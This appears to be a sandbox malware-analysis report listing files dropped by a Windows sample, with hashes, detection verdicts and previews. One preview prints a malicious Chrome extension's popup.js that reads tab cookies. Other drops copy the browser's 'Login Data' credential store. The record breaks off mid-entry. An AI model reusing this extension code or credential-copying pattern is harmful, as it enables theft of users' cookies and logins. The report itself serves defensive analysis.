                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\manifest.json
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2380
                                                                                                                                                                        Entropy (8bit):5.687293760500434
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
                                                                                                                                                                        MD5:ADF10776EEC8DC0F6E7E3B4AD59CF504
                                                                                                                                                                        SHA1:4F11FE569189036B42923EF5A8AFB0985DCECDF5
                                                                                                                                                                        SHA-256:ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
                                                                                                                                                                        SHA-512:7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: {.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http://*/*", "https://*/*" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\popup.html
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):280
                                                                                                                                                                        Entropy (8bit):5.048307538221611
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
                                                                                                                                                                        MD5:E93B02D6CFFCCA037F3EA55DC70EE969
                                                                                                                                                                        SHA1:DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
                                                                                                                                                                        SHA-256:B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
                                                                                                                                                                        SHA-512:F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: <!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\popup.js
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):642
                                                                                                                                                                        Entropy (8bit):4.985939227199713
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
                                                                                                                                                                        MD5:2AC02EE5F808BC4DEB832FB8E7F6F352
                                                                                                                                                                        SHA1:05375EF86FF516D91FB9746C0CBC46D2318BEB86
                                                                                                                                                                        SHA-256:DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
                                                                                                                                                                        SHA-512:6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: $(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):5468
                                                                                                                                                                        Entropy (8bit):5.178424878725887
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:nq6CbKM/XwdV8zsVPyk0JCKL8eGbOEQVuwv:nq6Cbh/gdVFy4K7
                                                                                                                                                                        MD5:E52AE16D8295111F41CE1017D6BBD717
                                                                                                                                                                        SHA1:13B9B7EB0D9803835987D908F328C5D2A67EFDCD
                                                                                                                                                                        SHA-256:B3F3400CE3E6F70DC2C916F71D3079799D8BCDA3F2321658091720CC0371A630
                                                                                                                                                                        SHA-512:F56A537EF5C61B285EB70847DCF3F1DD36E7BBB1A74419F51332BA99DCBA3992E89E6BCA69E61676668D26A7E2D47CE0FA2DFD19021DEB5451BA5417BB659D55
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13245951485918895","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0",
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):34636
                                                                                                                                                                        Entropy (8bit):5.537941123959356
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:gEyODNUckPWmr+VqLlCL1kXqKf/pUZNCgVLH2Hf6rUQGAnih9e:R5OLlvAnt
                                                                                                                                                                        MD5:A8880AA0B82D2CAA5A706D133ACD3070
                                                                                                                                                                        SHA1:92AC70E91495CCEBB080E1EDB657BFD0E810AC09
                                                                                                                                                                        SHA-256:DC1465579AB0AF761868D09122E283E44FBF2EFF167977C1A1BE71870C9542D0
                                                                                                                                                                        SHA-512:35E15BC84290D122286DE1404345FF9A5A2D55AF6B039B6F624C932B15CE7A3EABD4E5181810223744A0F320225DDF2D266C72916B74FACC6340ADB5FCB16679
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview: {"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245951492913444","lastpingday":"13245947458072931","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m
                                                                                                                                                                        C:\Users\user\AppData\Local\Login Data1612045889505
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.792852251086831
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Login Data1612045902661
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.792852251086831
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1612045891739
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:7-zip archive data, version 0.3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):37737
                                                                                                                                                                        Entropy (8bit):7.994967159065528
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
                                                                                                                                                                        MD5:5A6469A3F787ABD2AE93B47470528F79
                                                                                                                                                                        SHA1:4032B59237CC883FB752D9727971B435F4D27EB8
                                                                                                                                                                        SHA-256:1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
                                                                                                                                                                        SHA-512:335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: 7z..'...IVw '......."........S.......8%D...2 ..J...y1.C.......HE89.V.Z',n*.$.T.V.....O.%{.I.6!....."..:.L..nrH..A.m.......5.M.o......Q...r......|.k1..S"..w"Y...2pS....g.....V:y.;..+..P..8F.t...).&:.!j.....=...%.d.b.u.&..4y.<.97.[.`L]7...sZ.;.K..EA.lIO....N....D..\C.enT.f.....t.....]..w.....E...Ffc.$.Sw`].%.J.{........y.n2F.......v...#t.^.....Si&wb..A.@..#....bi_.....;..........!.~..........g.Q.@/.1\....*.f.q.=..t...).<|...?u.....JH.CD..i.s..4..c9.;X.._r7.9..{...wfg..:/.....?j.N.z....+...j)...K..v...4.9.......t.ZN...#.W.e...o...V..z...u...lNR..z.....fi.y.k......$...,N[.....F.U..~oJ.Cn.....+H..)....)!l...............8.....Z..(....L.~.....fsQ..W........p........q..T.....p.....uC..,;......1Pl...|.....G......-....=............L.......}O8y....H...g...E..c...k2c...&...4...]?A....FG....._.W.B?....p.X..gC........G...._Y.A..P..........k.../.7YO.c.M.i....|..^.+RP]...D.jq.z'..4.|I*......jq..w.%..2/|.....>..y...>......C.)8B7$Z...{P.~..&...b..........
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1612045892739
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:7-zip archive data, version 0.3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):553040
                                                                                                                                                                        Entropy (8bit):7.999671101282436
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
                                                                                                                                                                        MD5:A4427F2F46DEEA15CEA87BDBB53A22CC
                                                                                                                                                                        SHA1:158501079514868D85246E970314A024FF263199
                                                                                                                                                                        SHA-256:18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
                                                                                                                                                                        SHA-512:334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: 7z..'.....7..p......$........1...(..`(...<.^..-.+....Q.3D-.........i..si.a.,V.k.{JU.dk.'.h... KR.$~W...&. ..........<Y9.,.0.k+.<b...?zqlnw......\..5C...^...y.... ..FZ..0.$.....vds.....Yx.Q...x.._..Yk..n.>&.Y..7.B=.(.8.w<...sVs.V..6<o.(......b..t..b..@...~.........\..Y:r!ix....$!...{.h..,.......J..M".....0N.^..@..X.8.`...=._].._f.Q..D...3.==0..)f...............s..:...Gd...(!L....A)*:..r...>.....@.4.."s..G......j.7...{\...[..=.+y7..0.'...................i..d...!..b...c.s.}..g..(!,.H@<sl.*Y..'*....dm..?B.c7S..{...f...c...P.S.#...w=.+.M.U@u.....^.XI.....!u}...?.SYUK....O...G.]+.^....'..`&.a....F.......c..o....c..Z4.......Q1..1L..J.p.>...j.!.il>..y8..S...@....7..Hc...y...UNJj..9...@.../.'#.....N...BC?..C....Ga[J.vb....mn..@..z.../Kc.,Y<.tA*.2...O......|....Drrl)..7..9.....pNj.P6|].t .'.|.yb..SO.......`....H..-..h.+x..4...v1. ...'.4)3.N..,2_.U..]...I4y.R.I.....b.......N!e%.4.0*"l,.H.2..'..^42....9..sX..1.....8z.u#A\.....tbP........&...U....9
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        Process:C:\Users\user\Desktop\fnhcdXEfus.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):4453376
                                                                                                                                                                        Entropy (8bit):7.745694560857276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:98304:bCgleegKSmFIJuPzyoCe1NGDyqMcKzH4znz8xViN:bBbviJu7JC0UDLwzanz8xQ
                                                                                                                                                                        MD5:18169F98E39AE228D131AEC477C8A2E9
                                                                                                                                                                        SHA1:C6C6EACAA8DF6EA5251C7F26A2D9EC4317092E6A
                                                                                                                                                                        SHA-256:344B323928698D9982C7577E5405A1CB587C45F94A0F6745827648381397F255
                                                                                                                                                                        SHA-512:8DEACA50E918252BA85715C85096E810733A9512C656FA40AD71E22437CC8F74D1965468592929A4B1216D33DA598C308B312F5C1AA770F62959C873A4582EFB
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 35%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                        • Filename: fnhcdXEfus.exe, Detection: malicious, Browse
                                                                                                                                                                        Preview: MZ......................@.............................................d....L.!This program cannot be run in DOS mode....$.............Z..Z..Zw]qZ..Zw]lZ..Z$\oZ..Z$\lZZ..Z)..Z..Z$\mZ...Z)..Z...Z..Zu..Zw]mZ.Zw]kZ..Z.5Z..Zw]nZ..ZRich..Z........................PE..L...n..[.................F..........:R.......`....@.......................... ............@................................................................ ..T....h..8............................w..@............`...............................text....D.......F.................. ....rdata..*f...`...h...J..............@..@.data...p........$..................@....rsrc..............................@..@.reloc....... .......p..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe:Zone.Identifier
                                                                                                                                                                        Process:C:\Users\user\Desktop\fnhcdXEfus.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp
                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):6656
                                                                                                                                                                        Entropy (8bit):5.2861874904617645
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
                                                                                                                                                                        MD5:84878B1A26F8544BDA4E069320AD8E7D
                                                                                                                                                                        SHA1:51C6EE244F5F2FA35B563BFFB91E37DA848A759C
                                                                                                                                                                        SHA-256:809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
                                                                                                                                                                        SHA-512:4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                        • Filename: 6MhmlD8KZh.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: fnhcdXEfus.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: N1yprTBBXs.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: N1yprTBBXs.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.._F..e..&m...e...e...e...i...e...i...e...i...e..Rich.e..........PE..L......D...........!......................... ...............................@.......................................$......H#..P............................0......p ............................................... ..l............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):268744
                                                                                                                                                                        Entropy (8bit):5.398284390686728
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
                                                                                                                                                                        MD5:E2E9483568DC53F68BE0B80C34FE27FB
                                                                                                                                                                        SHA1:8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
                                                                                                                                                                        SHA-256:205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
                                                                                                                                                                        SHA-512:B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 8%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                        • Filename: fnhcdXEfus.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: N1yprTBBXs.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: N1yprTBBXs.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0.h.Q.;.Q.;.Q.;.Y.;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;Sr.;.Q.;.Y.;.Q.;*Y.;.Q.;.Q.;.P.;...;.Q.;'F.;.Q.;EZ.;.Q.;'F.;.Q.;Rich.Q.;........................PE..L...^..S..........................................@..........................`......"Q...............................................P..x............................................................................................................textbss1U...............................text...>....p...................... ..`.rdata...i.......p... ..............@..@.data...L...........................@....idata...J.......P..................@....rsrc...x....P......................@..@........................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):73160
                                                                                                                                                                        Entropy (8bit):6.49500452335621
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
                                                                                                                                                                        MD5:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                                        SHA1:27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
                                                                                                                                                                        SHA-256:298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
                                                                                                                                                                        SHA-512:65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D."C..L...L...L.......L.....&.L.......L.....Y.L.'~!...L.'~7...L...M.\.L.......L.......L.......L.Rich..L.........PE..L......P.....................X.......$............@..........................@......>.....@.....................................P............................ ..d...`...............................P...@............... ............................text...|........................... ..`.rdata...&.......(..................@..@.data...............................@....rsrc...............................@..@.reloc..H.... ......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\download\atl71.dll
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):89600
                                                                                                                                                                        Entropy (8bit):6.46929682960805
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
                                                                                                                                                                        MD5:79CB6457C81ADA9EB7F2087CE799AAA7
                                                                                                                                                                        SHA1:322DDDE439D9254182F5945BE8D97E9D897561AE
                                                                                                                                                                        SHA-256:A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
                                                                                                                                                                        SHA-512:ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Er................................0....................................................Rich...........................PE..L...PK.D...........!................r..............|................................................................p...........<....@..0#...................p..H...0...................................@...............0............................text...4........................... ..`.rdata..M7.......8..................@..@.data........ ......................@....rsrc...0#...@...$...$..............@..@.reloc.......p.......H..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):92080
                                                                                                                                                                        Entropy (8bit):5.923150781730819
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
                                                                                                                                                                        MD5:DBA9A19752B52943A0850A7E19AC600A
                                                                                                                                                                        SHA1:3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
                                                                                                                                                                        SHA-256:69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
